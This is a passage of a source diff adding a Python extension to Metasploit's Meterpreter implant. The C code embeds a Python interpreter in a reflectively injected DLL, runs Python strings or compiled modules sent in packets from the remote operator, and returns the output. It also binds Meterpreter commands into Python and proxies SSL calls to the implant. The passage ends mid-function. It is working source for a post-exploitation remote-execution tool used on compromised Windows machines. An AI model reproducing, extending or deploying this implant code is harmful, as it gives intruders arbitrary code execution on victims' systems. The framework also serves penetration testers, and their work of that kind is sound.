dprintf("[PYTHON] destroyed handlers");
}
/*!
* @brief Destroy the session.
*/
VOID python_destroy_session()
{
destroy_std_handlers();
Py_Finalize();
}
/*!
* @brief Prepare the session for use, including all the resources that are embedded.
*/
VOID python_prepare_session()
{
Py_IgnoreEnvironmentFlag = 1;
Py_NoSiteFlag = 1;
Py_Initialize();
PyEval_InitThreads();
PyObject* stdoutModule = Py_InitModule("meterpreter_stdout", meterpreter_stdout_hooks);
if (stdoutModule != NULL && PySys_SetObject("stdout", stdoutModule) == 0)
{
dprintf("[PYTHON] Successfully set the stdout hook");
}
else
{
dprintf("[PYTHON] Failed to set the stdout hook");
}
PyObject* stderrModule = Py_InitModule("meterpreter_stderr", meterpreter_stderr_hooks);
if (stderrModule != NULL && PySys_SetObject("stderr", stderrModule) == 0)
{
dprintf("[PYTHON] Successfully set the stderr hook");
}
else
{
dprintf("[PYTHON] Failed to set the stderr hook");
}
// with the output handlers sorted, we load the stuff from the compressed resource
// which should give us all the stuff we need to be useful.
initerrno();
initnt();
init_socket();
init_functools();
// have we loaded the core pointer already?
if (coreLibPointer == NULL)
{
MEMORY_BASIC_INFORMATION mbi;
if (!VirtualQuery((LPVOID)python_prepare_session, &mbi, sizeof(mbi)))
{
dprintf("[PYTHON] VirtualQuery failed: %d", GetLastError());
return;
}
HMODULE mod = (HMODULE)mbi.AllocationBase;
dprintf("[PYTHON] Module handle: %p", (LPVOID)mod);
HRSRC res = FindResource(mod, MAKEINTRESOURCEA(IDR_PYTHON_CORE), "BINARY");
if (res == NULL)
{
dprintf("[PYTHON] Unable to find resource: %d", GetLastError());
return;
}
HGLOBAL file = LoadResource(mod, res);
if (file == NULL)
{
dprintf("[PYTHON] Unable to load core library resource: %d", GetLastError());
return;
}
// store these pointers for when we reset the session, saves us from
// doing all of this nonsense again.
coreLibPointer = (LPBYTE)LockResource(file);
coreLibSize = *(LPDWORD)coreLibPointer;
coreLibPointer += sizeof(DWORD);
}
dprintf("[PYTHON] coreLibPointer: %p, coreLibSize: %d", coreLibPointer, coreLibSize);
if (coreLibPointer != NULL)
{
// Create a byte array with everything in it
PyObject* libString = PyString_FromStringAndSize(coreLibPointer, coreLibSize);
dprintf("[PYTHON] libString is %p", libString);
// import zlib
PyObject* zlibModStr = PyString_FromString("zlib");
dprintf("[PYTHON] zlibModStr: %p", zlibModStr);
PyObject* zlibMod = PyImport_Import(zlibModStr);
dprintf("[PYTHON] zlibMod: %p", zlibMod);
// get a reference to the decompress function
PyObject* zlibDecompress = PyObject_GetAttrString(zlibMod, "decompress");
dprintf("[PYTHON] zlibDecompress: %p", zlibDecompress);
// prepare arguments for invocation
PyObject* zlibDecompressArgs = PyTuple_Pack(1, libString);
dprintf("[PYTHON] zlibDecompressArgs: %p", zlibDecompressArgs);
// call zlib.decompress(libString)
PyObject* zlibDecompressResult = PyObject_CallObject(zlibDecompress, zlibDecompressArgs);
dprintf("[PYTHON] zlibDecompressResult: %p", zlibDecompressResult);
//dprintf("[PYTHON] zlibDecompressResult type: %s", zlibDecompressResult->ob_type->tp_name);
PCHAR byteArray = NULL;
Py_ssize_t byteArrayLength = 0;
PyString_AsStringAndSize(zlibDecompressResult, &byteArray, &byteArrayLength);
dprintf("[PYTHON] bytes: %p %u", byteArray, byteArrayLength);
PyObject* modData = PyMarshal_ReadObjectFromString(byteArray, byteArrayLength);
dprintf("[PYTHON] modData: %p", modData);
PyObject* mainMod = PyImport_AddModule("__main__");
PyObject* mainDict = PyModule_GetDict(mainMod);
PyModule_AddObject(mainMod, "met_lib_data", modData);
// TODO: double-check that we don't need to remove existing finders which might
// hit the file system
#ifdef DEBUGTRACE
PyRun_SimpleString("eval(met_lib_data[0]);met_init(True)");
#else
PyRun_SimpleString("eval(met_lib_data[0]);met_init(False)");
#endif
// TODO: figure out which reference counts need to be reduce to avoid leaking.
}
// now load the baked-in modules
PyErr_Clear();
for (InitFunc* f = &init_funcs[0]; f->func != NULL; f += 1)
{
dprintf("[PYTHON] Running %s", f->name);
f->func();
if (PyErr_Occurred())
{
#ifdef DEBUGTRACE
PyErr_Print();
#endif
dprintf("[PYTHON] %s errored", f->name);
PyErr_Clear();
}
}
initialize_std_handlers();
binding_init();
}
/*!
* @brief Reset/restart the interpreter.
* @param remote Pointer to the \c Remote making the request.
* @param packet Pointer to the request \c Packet.
* @returns Indication of success or failure.
*/
DWORD request_python_reset(Remote* remote, Packet* packet)
{
dprintf("[PYTHON] resetting the interpreter");
destroy_std_handlers();
Py_Finalize();
Py_Initialize();
python_prepare_session();
packet_transmit_empty_response(remote, packet, ERROR_SUCCESS);
return ERROR_SUCCESS;
}
/*!
* @brief Execute a block of python given in a string and return the result/output.
* @param remote Pointer to the \c Remote making the request.
* @param packet Pointer to the request \c Packet.
* @returns Indication of success or failure.
*/
DWORD request_python_execute(Remote* remote, Packet* packet)
{
DWORD dwResult = ERROR_SUCCESS;
Packet* response = packet_create_response(packet);
LPBYTE pythonCode = packet_get_tlv_value_raw(packet, TLV_TYPE_EXTENSION_PYTHON_CODE);
PyObject* mainModule = PyImport_AddModule("__main__");
PyObject* mainDict = PyModule_GetDict(mainModule);
if (pythonCode != NULL)
{
UINT codeType = packet_get_tlv_value_uint(packet, TLV_TYPE_EXTENSION_PYTHON_CODE_TYPE);
if (codeType == PY_CODE_TYPE_STRING)
{
dprintf("[PYTHON] attempting to run string: %s", pythonCode);
PyRun_SimpleString(pythonCode);
}
else
{
CHAR* modName = packet_get_tlv_value_string(packet, TLV_TYPE_EXTENSION_PYTHON_NAME);
dprintf("[PYTHON] module name: %s", modName);
if (modName)
{
PyObject* pyModName = PyString_FromString(modName);
PyModule_AddObject(mainModule, "met_mod_name", pyModName);
}
if (codeType == PY_CODE_TYPE_PY)
{
dprintf("[PYTHON] importing .py file");
PyObject* pyModBody = PyString_FromString(pythonCode);
PyModule_AddObject(mainModule, "met_mod_body", pyModBody);
}
else
{
dprintf("[PYTHON] importing .pyc file");
// must be a pyc file
UINT pythonCodeLength = packet_get_tlv_value_uint(packet, TLV_TYPE_EXTENSION_PYTHON_CODE_LEN);
PyObject* pyModBody = PyString_FromStringAndSize(pythonCode, pythonCodeLength);
dprintf("[PYTHON] myModBody %p: %s", pyModBody, pyModBody->ob_type->tp_name);
PyModule_AddObject(mainModule, "met_mod_body", pyModBody);
}
dprintf("[PYTHON] executing import, GO GO GO !");
PyRun_SimpleString("met_import_code()");
}
CHAR* resultVar = packet_get_tlv_value_string(packet, TLV_TYPE_EXTENSION_PYTHON_RESULT_VAR);
if (resultVar)
{
PyObject* result = PyDict_GetItemString(mainDict, resultVar);
if (result != NULL)
{
if (PyString_Check(result))
{
// result is already a string
packet_add_tlv_string(response, TLV_TYPE_EXTENSION_PYTHON_RESULT, PyString_AsString(result));
}
else
{
PyObject* resultStr = PyObject_Str(result);
packet_add_tlv_string(response, TLV_TYPE_EXTENSION_PYTHON_RESULT, PyString_AsString(resultStr));
Py_DECREF(resultStr);
}
}
}
dump_to_packet(stderrBuffer, response, TLV_TYPE_EXTENSION_PYTHON_STDERR);
clear_std_handler(stderrBuffer);
dump_to_packet(stdoutBuffer, response, TLV_TYPE_EXTENSION_PYTHON_STDOUT);
clear_std_handler(stdoutBuffer);
packet_transmit_response(dwResult, remote, response);
}
return dwResult;
}

16
c/meterpreter/source/extensions/python/python_commands.h Executable file
View File

@ -0,0 +1,16 @@
/*!
* @file python_commands.h
* @brief Declarations for the python command functions.
*/
#ifndef _METERPRETER_SOURCE_EXTENSION_PYTHON_PYTHON_COMMANDS
#define _METERPRETER_SOURCE_EXTENSION_PYTHON_PYTHON_COMMANDS
#include "../../common/common.h"
VOID python_prepare_session();
VOID python_destroy_session();
DWORD request_python_reset(Remote* remote, Packet* packet);
DWORD request_python_execute(Remote* remote, Packet* packet);
#endif

112
c/meterpreter/source/extensions/python/python_main.c Executable file
View File

@ -0,0 +1,112 @@
/*!
* @file python_main.c
* @brief Entry point and intialisation definitions for the python extension.
*/
#include "../../common/common.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "python_commands.h"
#include "python_meterpreter_binding.h"
// This is the entry point to the python DLL, we proxy to this from our own init
extern BOOL WINAPI PythonDllMain(HANDLE hInst, ULONG ul_reason_for_call, LPVOID lpReserved);
extern BOOL WINAPI CtypesDllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvRes);
Remote* gRemote = NULL;
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
/*! @brief List of commands that the extended API extension providers. */
Command customCommands[] =
{
COMMAND_REQ("python_reset", request_python_reset),
COMMAND_REQ("python_execute", request_python_execute),
COMMAND_TERMINATOR
};
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
switch( dwReason )
{
case DLL_QUERY_HMODULE:
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
PythonDllMain(hinstDLL, dwReason, lpReserved);
CtypesDllMain(hinstDLL, dwReason, lpReserved);
return TRUE;
}
/*!
* @brief Callback for when a command has been added to the meterpreter instance.
* @param commandName The name of the command that has been added.
*/
VOID __declspec(dllexport) CommandAdded(const char* commandName)
{
binding_add_command(commandName);
}
/*!
* @brief Initialize the server extension.
* @param remote Pointer to the remote instance.
* @return Indication of success or failure.
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
hMetSrv = remote->met_srv;
gRemote = remote;
dprintf("[PYTHON] Initialising");
binding_startup();
python_prepare_session();
dprintf("[PYTHON] Registering commands");
command_register_all(customCommands);
return ERROR_SUCCESS;
}
/*!
* @brief Deinitialize the server extension.
* @param remote Pointer to the remote instance.
* @return Indication of success or failure.
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
command_deregister_all(customCommands);
python_destroy_session();
return ERROR_SUCCESS;
}
/*!
* @brief Get the name of the extension.
* @param buffer Pointer to the buffer to write the name to.
* @param bufferSize Size of the \c buffer parameter.
* @return Indication of success or failure.
*/
DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
{
strncpy_s(buffer, bufferSize, "python", bufferSize - 1);
return ERROR_SUCCESS;
}

24
c/meterpreter/source/extensions/python/python_main.h Executable file
View File

@ -0,0 +1,24 @@
/*!
* @file python_main.h
* @brief Entry point and intialisation declarations for the python extension.
*/
#ifndef _METERPRETER_SOURCE_EXTENSION_PYTHON_PYTHON_MAIN_H
#define _METERPRETER_SOURCE_EXTENSION_PYTHON_PYTHON_MAIN_H
#include "../../common/common.h"
extern Remote* gRemote;
#define TLV_TYPE_EXTENSION_PYTHON 0
#define TLV_TYPE_EXTENSION_PYTHON_STDOUT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_PYTHON, TLV_EXTENSIONS + 1)
#define TLV_TYPE_EXTENSION_PYTHON_STDERR MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_PYTHON, TLV_EXTENSIONS + 2)
#define TLV_TYPE_EXTENSION_PYTHON_CODE MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_PYTHON, TLV_EXTENSIONS + 3)
#define TLV_TYPE_EXTENSION_PYTHON_CODE_LEN MAKE_CUSTOM_TLV(TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_PYTHON, TLV_EXTENSIONS + 4)
#define TLV_TYPE_EXTENSION_PYTHON_CODE_TYPE MAKE_CUSTOM_TLV(TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_PYTHON, TLV_EXTENSIONS + 5)
#define TLV_TYPE_EXTENSION_PYTHON_NAME MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_PYTHON, TLV_EXTENSIONS + 6)
#define TLV_TYPE_EXTENSION_PYTHON_RESULT_VAR MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_PYTHON, TLV_EXTENSIONS + 7)
#define TLV_TYPE_EXTENSION_PYTHON_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_PYTHON, TLV_EXTENSIONS + 8)
#endif

85
c/meterpreter/source/extensions/python/python_meterpreter_binding.c Executable file
View File

@ -0,0 +1,85 @@
/*!
* @file python_meterpreter_binding.c
* @brief Definitions for functions that support meterpreter bindings.
*/
#include "../../common/common.h"
#include "python_main.h"
#include "Python.h"
static PLIST gBoundCommandList = NULL;
static PyObject* gMeterpreterModule = NULL;
static PyMethodDef* gMeterpreterMethods = NULL;
static PLIST gMeterpreterMethodDefs = NULL;
static PyObject* binding_invoke(PyObject* self, PyObject* args)
{
dprintf("[PYTHON] a function was invoked on: %s", self->ob_type->tp_name);
const char* packetBytes = NULL;
BOOL isLocal = FALSE;
Py_ssize_t packetLength = 0;
PyArg_ParseTuple(args, "is#", &isLocal, &packetBytes, &packetLength);
dprintf("[PYTHON] packet %p is %u bytes and is %s", packetBytes, packetLength, isLocal ? "local" : "not local");
Packet packet = { 0 };
packet.header = *(TlvHeader*)packetBytes;
packet.payload = (PUCHAR)(packetBytes + sizeof(TlvHeader));
packet.payloadLength = (ULONG)packetLength - sizeof(TlvHeader);
// If the functionality doesn't require interaction with MSF, then
// make the packet as local so that the packet receives the request
// and so that the packet doesn't get sent to Meterpreter
packet.local = isLocal;
command_handle(gRemote, &packet);
// really not sure how to deal with the non-local responses at this point.
if (packet.partner == NULL)
{
// "None"
return Py_BuildValue("");
}
PyObject* result = PyString_FromStringAndSize(packet.partner->payload, packet.partner->payloadLength);
packet_destroy(packet.partner);
return result;
}
VOID binding_insert_command(const char* commandName)
{
static PyMethodDef def;
dprintf("[PYTHON] inserting command %s", commandName);
def.ml_name = commandName;
def.ml_meth = binding_invoke;
def.ml_flags = METH_VARARGS;
def.ml_doc = NULL;
PyObject* fun = PyCFunction_New(&def, gMeterpreterModule);
PyModule_AddObject(gMeterpreterModule, commandName, fun);
}
VOID binding_startup()
{
if (gBoundCommandList == NULL)
{
gBoundCommandList = list_create();
}
}
VOID binding_add_command(const char* commandName)
{
dprintf("[PYTHON] Adding command %s", (char*)commandName);
list_add(gBoundCommandList, (char*)commandName);
binding_insert_command(commandName);
}
VOID binding_init()
{
dprintf("[PYTHON] Initialising binding...");
gMeterpreterModule = Py_InitModule("meterpreter_bindings", NULL);
for (PNODE node = gBoundCommandList->start; node != NULL; node = node->next)
{
binding_insert_command((const char*)node->data);
}
}

8
c/meterpreter/source/extensions/python/python_meterpreter_binding.h Executable file
View File

@ -0,0 +1,8 @@
/*!
* @file python_meterpreter_binding.y
* @brief Declrations for functions that support meterpreter bindings.
*/
VOID binding_startup();
VOID binding_add_command();
VOID binding_init();

644
c/meterpreter/source/extensions/python/python_ssl_bridge.c Executable file
View File

@ -0,0 +1,644 @@
/*!
* @file python_ssl_bridge.c
* @brief Bridge functions that wire SSL calls into metsrv's implementation
* @remark This was created so that we didn't have to modify the source code to
* python itself. Instead, these functions work as a proxy to the existing
* instance of SSL that comes with metsrv. we could remove the calls and just
* work directly with gRemote, but modifying the python source means we have
* overhead every time we merge a new version of python. For this small effort
* it was worth doing it this way to make future merges easy.
*/
#include "../../common/common.h"
#include "openssl/err.h"
#include "python_main.h"
int RAND_status()
{
return gRemote->ssl.RAND_status();
}
void RAND_add(const void *buf, int num, double entropy)
{
gRemote->ssl.RAND_add(buf, num, entropy);
}
int RAND_egd(const char *path)
{
return gRemote->ssl.RAND_egd(path);
}
ERR_STATE *ERR_get_state()
{
return gRemote->ssl.ERR_get_state();
}
const char *ERR_reason_error_string(unsigned long e)
{
return gRemote->ssl.ERR_reason_error_string(e);
}
void ERR_clear_error()
{
gRemote->ssl.ERR_clear_error();
}
unsigned long ERR_peek_last_error()
{
return gRemote->ssl.ERR_peek_last_error();
}
const COMP_METHOD *SSL_get_current_compression(SSL *s)
{
return gRemote->ssl.SSL_get_current_compression(s);
}
void *SSL_get_ex_data(const SSL *ssl,int idx)
{
return gRemote->ssl.SSL_get_ex_data(ssl, idx);
}
SSL_CTX *SSL_set_SSL_CTX(SSL *ssl, SSL_CTX* ctx)
{
return gRemote->ssl.SSL_set_SSL_CTX(ssl, ctx);
}
SSL_CTX *SSL_get_SSL_CTX(const SSL *ssl)
{
return gRemote->ssl.SSL_get_SSL_CTX(ssl);
}
int SSL_CTX_load_verify_locations(SSL_CTX *ctx, const char *CAfile, const char *CApath)
{
return gRemote->ssl.SSL_CTX_load_verify_locations(ctx, CAfile, CApath);
}
int SSL_CTX_set_default_verify_paths(SSL_CTX *ctx)
{
return gRemote->ssl.SSL_CTX_set_default_verify_paths(ctx);
}
int SSL_get_shutdown(const SSL *ssl)
{
return gRemote->ssl.SSL_get_shutdown(ssl);
}
int SSL_library_init()
{
return gRemote->ssl.SSL_library_init();
}
void SSL_set_accept_state(SSL *s)
{
gRemote->ssl.SSL_set_accept_state(s);
}
void SSL_set_connect_state(SSL *s)
{
gRemote->ssl.SSL_set_connect_state(s);
}
int SSL_shutdown(SSL *s)
{
return gRemote->ssl.SSL_shutdown(s);
}
int SSL_do_handshake(SSL *s)
{
return gRemote->ssl.SSL_do_handshake(s);
}
SSL_METHOD *TLSv1_method()
{
return gRemote->ssl.TLSv1_method();
}
SSL_METHOD *SSLv23_method()
{
return gRemote->ssl.SSLv23_method();
}
SSL_METHOD *SSLv3_method()
{
return gRemote->ssl.SSLv3_method();
}
SSL_METHOD *SSLv2_method()
{
return gRemote->ssl.SSLv2_method();
}
const char *SSL_get_version(const SSL *s)
{
return gRemote->ssl.SSL_get_version(s);
}
int SSL_get_error(const SSL *s,int ret_code)
{
return gRemote->ssl.SSL_get_error(s, ret_code);
}
long SSL_CTX_callback_ctrl(SSL_CTX * ctx, int cmd, void (*callback)(void))
{
return gRemote->ssl.SSL_CTX_callback_ctrl(ctx, cmd, callback);
}
long SSL_CTX_ctrl(SSL_CTX *ctx,int cmd, long larg, void *parg)
{
return gRemote->ssl.SSL_CTX_ctrl(ctx, cmd, larg, parg);
}
void SSL_free(SSL *ssl)
{
gRemote->ssl.SSL_free(ssl);
}
int SSL_read(SSL *ssl,void *buf,int num)
{
return gRemote->ssl.SSL_read(ssl, buf, num);
}
int SSL_write(SSL *ssl,const void *buf,int num)
{
return gRemote->ssl.SSL_write(ssl, buf, num);
}
SSL* SSL_new(SSL_CTX *ctx)
{
return gRemote->ssl.SSL_new(ctx);
}
int SSL_CTX_set_session_id_context(SSL_CTX *ctx,const unsigned char *sid_ctx, unsigned int sid_ctx_len)
{
return gRemote->ssl.SSL_CTX_set_session_id_context(ctx, sid_ctx, sid_ctx_len);
}
int SSL_CTX_check_private_key(const SSL_CTX *ctx)
{
return gRemote->ssl.SSL_CTX_check_private_key(ctx);
}
void SSL_CTX_set_default_passwd_cb(SSL_CTX *ctx, pem_password_cb *cb)
{
gRemote->ssl.SSL_CTX_set_default_passwd_cb(ctx, cb);
}
void SSL_CTX_set_default_passwd_cb_userdata(SSL_CTX *ctx, void *u)
{
gRemote->ssl.SSL_CTX_set_default_passwd_cb_userdata(ctx, u);
}
int SSL_set_ex_data(SSL *ssl, int idx, void *data)
{
return gRemote->ssl.SSL_set_ex_data(ssl, idx, data);
}
long SSL_ctrl(SSL *ssl,int cmd, long larg, void *parg)
{
return gRemote->ssl.SSL_ctrl(ssl, cmd, larg, parg);
}
void SSL_CTX_set_verify(SSL_CTX *ctx,int mode, int (*callback)(int, X509_STORE_CTX *))
{
gRemote->ssl.SSL_CTX_set_verify(ctx, mode, callback);
}
int SSL_CTX_get_verify_mode(const SSL_CTX *ctx)
{
return gRemote->ssl.SSL_CTX_get_verify_mode(ctx);
}
X509 * SSL_get_peer_certificate(const SSL *s)
{
return gRemote->ssl.SSL_get_peer_certificate(s);
}
void SSL_load_error_strings()
{
gRemote->ssl.SSL_load_error_strings();
}
int SSL_CTX_use_certificate_chain_file(SSL_CTX *ctx, const char *file)
{
return gRemote->ssl.SSL_CTX_use_certificate_chain_file(ctx, file);
}
int SSL_CTX_use_PrivateKey_file(SSL_CTX *ctx, const char *file, int type)
{
return gRemote->ssl.SSL_CTX_use_PrivateKey_file(ctx, file, type);
}
void SSL_set_read_ahead(SSL *s, int yes)
{
gRemote->ssl.SSL_set_read_ahead(s, yes);
}
BIO * SSL_get_wbio(const SSL *s)
{
return gRemote->ssl.SSL_get_wbio(s);
}
BIO * SSL_get_rbio(const SSL *s)
{
return gRemote->ssl.SSL_get_rbio(s);
}
int SSL_set_fd(SSL *s, int fd)
{
return gRemote->ssl.SSL_set_fd(s, fd);
}
int SSL_pending(const SSL *s)
{
return gRemote->ssl.SSL_pending(s);
}
char * SSL_CIPHER_get_version(const SSL_CIPHER *c)
{
return gRemote->ssl.SSL_CIPHER_get_version(c);
}
const char * SSL_CIPHER_get_name(const SSL_CIPHER *c)
{
return gRemote->ssl.SSL_CIPHER_get_name(c);
}
int SSL_CIPHER_get_bits(const SSL_CIPHER *c,int *alg_bits)
{
return gRemote->ssl.SSL_CIPHER_get_bits(c, alg_bits);
}
SSL_CIPHER *SSL_get_current_cipher(const SSL *s)
{
return gRemote->ssl.SSL_get_current_cipher(s);
}
X509_STORE *SSL_CTX_get_cert_store(const SSL_CTX * c)
{
return gRemote->ssl.SSL_CTX_get_cert_store(c);
}
void SSL_CTX_free(SSL_CTX * c)
{
gRemote->ssl.SSL_CTX_free(c);
}
SSL_CTX *SSL_CTX_new(SSL_METHOD *meth)
{
return gRemote->ssl.SSL_CTX_new(meth);
}
int SSL_CTX_set_cipher_list(SSL_CTX * c,const char *str)
{
return gRemote->ssl.SSL_CTX_set_cipher_list(c, str);
}
size_t SSL_get_finished(const SSL *s, void *buf, size_t count)
{
return gRemote->ssl.SSL_get_finished(s, buf, count);
}
size_t SSL_get_peer_finished(const SSL *s, void *buf, size_t count)
{
return gRemote->ssl.SSL_get_peer_finished(s, buf, count);
}
const char *SSL_get_servername(const SSL *s, const int type)
{
return gRemote->ssl.SSL_get_servername(s, type);
}
int PEM_read_bio(BIO *bp, char **name, char **header, unsigned char **data,long *len)
{
return gRemote->ssl.PEM_read_bio(bp, name, header, data, len);
}
X509* PEM_read_bio_X509(BIO *bp, X509 **x, pem_password_cb *cb, void *u)
{
return gRemote->ssl.PEM_read_bio_X509(bp, x, cb, u);
}
X509* PEM_read_bio_X509_AUX(BIO *bp, X509 **x, pem_password_cb *cb, void *u)
{
return gRemote->ssl.PEM_read_bio_X509_AUX(bp, x, cb, u);
}
int X509_check_ca(X509 *x)
{
return gRemote->ssl.X509_check_ca(x);
}
DH* PEM_read_bio_DHparams(BIO *bp, DH **x, pem_password_cb *cb, void *u)
{
return gRemote->ssl.PEM_read_bio_DHparams(bp, x, cb, u);
}
X509V3_EXT_METHOD *X509V3_EXT_get(X509_EXTENSION *ext)
{
return gRemote->ssl.X509V3_EXT_get(ext);
}
void AUTHORITY_INFO_ACCESS_free(AUTHORITY_INFO_ACCESS* a)
{
gRemote->ssl.AUTHORITY_INFO_ACCESS_free(a);
}
int GENERAL_NAME_print(BIO* out, GENERAL_NAME* gen)
{
return gRemote->ssl.GENERAL_NAME_print(out, gen);
}
void GENERAL_NAME_free(GENERAL_NAME* gen)
{
gRemote->ssl.GENERAL_NAME_free(gen);
}
int X509_add_ext(X509 *x, X509_EXTENSION *ex, int loc)
{
return gRemote->ssl.X509_add_ext(x, ex, loc);
}
void* X509_get_ext_d2i(X509 *x, int nid, int *crit, int *idx)
{
return gRemote->ssl.X509_get_ext_d2i(x, nid, crit, idx);
}
int X509_get_ext_by_NID(X509 *x, int nid, int lastpos)
{
return gRemote->ssl.X509_get_ext_by_NID(x, nid, lastpos);
}
ASN1_OBJECT* X509_NAME_ENTRY_get_object(X509_NAME_ENTRY *ne)
{
return gRemote->ssl.X509_NAME_ENTRY_get_object(ne);
}
ASN1_STRING* X509_NAME_ENTRY_get_data(X509_NAME_ENTRY *ne)
{
return gRemote->ssl.X509_NAME_ENTRY_get_data(ne);
}
X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc)
{
return gRemote->ssl.X509_NAME_get_entry(name, loc);
}
int X509_NAME_entry_count(X509_NAME *name)
{
return gRemote->ssl.X509_NAME_entry_count(name);
}
X509_NAME* X509_get_subject_name(X509 *a)
{
return gRemote->ssl.X509_get_subject_name(a);
}
ASN1_INTEGER* X509_get_serialNumber(X509 *x)
{
return gRemote->ssl.X509_get_serialNumber(x);
}
X509_EXTENSION* X509_get_ext(X509 *x, int loc)
{
return gRemote->ssl.X509_get_ext(x, loc);
}
X509_NAME* X509_get_issuer_name(X509 *a)
{
return gRemote->ssl.X509_get_issuer_name(a);
}
void X509_free(X509* a)
{
gRemote->ssl.X509_free(a);
}
int i2d_X509(X509* a, unsigned char** out)
{
return gRemote->ssl.i2d_X509(a, out);
}
char* sk_value(const STACK* s, int i)
{
return gRemote->ssl.sk_value(s, i);
}
int sk_num(const STACK* s)
{
return gRemote->ssl.sk_num(s);
}
void sk_pop_free(STACK *st, void(*func)(void *))
{
gRemote->ssl.sk_pop_free(st, func);
}
const char* SSLeay_version(int type)
{
return gRemote->ssl.SSLeay_version(type);
}
unsigned long SSLeay()
{
return gRemote->ssl.SSLeay();
}
int CRYPTO_num_locks()
{
return gRemote->ssl.CRYPTO_num_locks();
}
void CRYPTO_set_locking_callback(void(*func)(int, int, const char *, int))
{
gRemote->ssl.CRYPTO_set_locking_callback(func);
}
void CRYPTO_set_id_callback(unsigned long(*func)(void))
{
gRemote->ssl.CRYPTO_set_id_callback(func);
}
void CRYPTO_free(void* p)
{
gRemote->ssl.CRYPTO_free(p);
}
BIO_METHOD* BIO_s_file()
{
return gRemote->ssl.BIO_s_file();
}
BIO *BIO_new_file(const char *filename, const char *mode)
{
return gRemote->ssl.BIO_new_file(filename, mode);
}
BIO* BIO_new(BIO_METHOD *type)
{
return gRemote->ssl.BIO_new(type);
}
int BIO_gets(BIO *bp, char *buf, int size)
{
return gRemote->ssl.BIO_gets(bp, buf, size);
}
long BIO_ctrl(BIO *bp, int cmd, long larg, void *parg)
{
return gRemote->ssl.BIO_ctrl(bp, cmd, larg, parg);
}
BIO_METHOD *BIO_s_mem(void)
{
return gRemote->ssl.BIO_s_mem();
}
BIO* BIO_new_mem_buf(void *buf, int len)
{
return gRemote->ssl.BIO_new_mem_buf(buf, len);
}
int BIO_free(BIO *a)
{
return gRemote->ssl.BIO_free(a);
}
void ASN1_OBJECT_free(ASN1_OBJECT *a)
{
gRemote->ssl.ASN1_OBJECT_free(a);
}
int ASN1_STRING_length(ASN1_STRING *x)
{
return gRemote->ssl.ASN1_STRING_length(x);
}
unsigned char* ASN1_STRING_data(ASN1_STRING *x)
{
return gRemote->ssl.ASN1_STRING_data(x);
}
int i2a_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *a)
{
return gRemote->ssl.i2a_ASN1_INTEGER(bp, a);
}
long ASN1_INTEGER_get(ASN1_INTEGER *a)
{
return gRemote->ssl.ASN1_INTEGER_get(a);
}
int ASN1_STRING_to_UTF8(unsigned char **out, ASN1_STRING *in)
{
return gRemote->ssl.ASN1_STRING_to_UTF8(out, in);
}
int ASN1_TIME_print(BIO *fp, ASN1_TIME *a)
{
return gRemote->ssl.ASN1_TIME_print(fp, a);
}
ASN1_VALUE* ASN1_item_d2i(ASN1_VALUE **val, const unsigned char **in, long len, const ASN1_ITEM *it)
{
return gRemote->ssl.ASN1_item_d2i(val, in, len, it);
}
ASN1_OBJECT* OBJ_nid2obj(int n)
{
return gRemote->ssl.OBJ_nid2obj(n);
}
const char* OBJ_nid2ln(int n)
{
return gRemote->ssl.OBJ_nid2ln(n);
}
const char* OBJ_nid2sn(int n)
{
return gRemote->ssl.OBJ_nid2sn(n);
}
int OBJ_obj2nid(const ASN1_OBJECT *o)
{
return gRemote->ssl.OBJ_obj2nid(o);
}
ASN1_OBJECT* OBJ_txt2obj(const char *s, int no_name)
{
return gRemote->ssl.OBJ_txt2obj(s, no_name);
}
int OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name)
{
return gRemote->ssl.OBJ_obj2txt(buf, buf_len, a, no_name);
}
int OBJ_sn2nid(const char *s)
{
return gRemote->ssl.OBJ_sn2nid(s);
}
void OPENSSL_add_all_algorithms_noconf()
{
gRemote->ssl.OPENSSL_add_all_algorithms_noconf();
}
EC_KEY* EC_KEY_new_by_curve_name(int nid)
{
return gRemote->ssl.EC_KEY_new_by_curve_name(nid);
}
void EC_KEY_free(EC_KEY* k)
{
gRemote->ssl.EC_KEY_free(k);
}
void DH_free(DH *dh)
{
gRemote->ssl.DH_free(dh);
}
int X509_STORE_add_cert(X509_STORE *ctx, X509 *x)
{
return gRemote->ssl.X509_STORE_add_cert(ctx, x);
}
int X509_VERIFY_PARAM_set_flags(X509_VERIFY_PARAM *param, unsigned long flags)
{
return gRemote->ssl.X509_VERIFY_PARAM_set_flags(param, flags);
}
int X509_VERIFY_PARAM_clear_flags(X509_VERIFY_PARAM *param, unsigned long flags)
{
return gRemote->ssl.X509_VERIFY_PARAM_clear_flags(param, flags);
}
unsigned long X509_VERIFY_PARAM_get_flags(X509_VERIFY_PARAM *param)
{
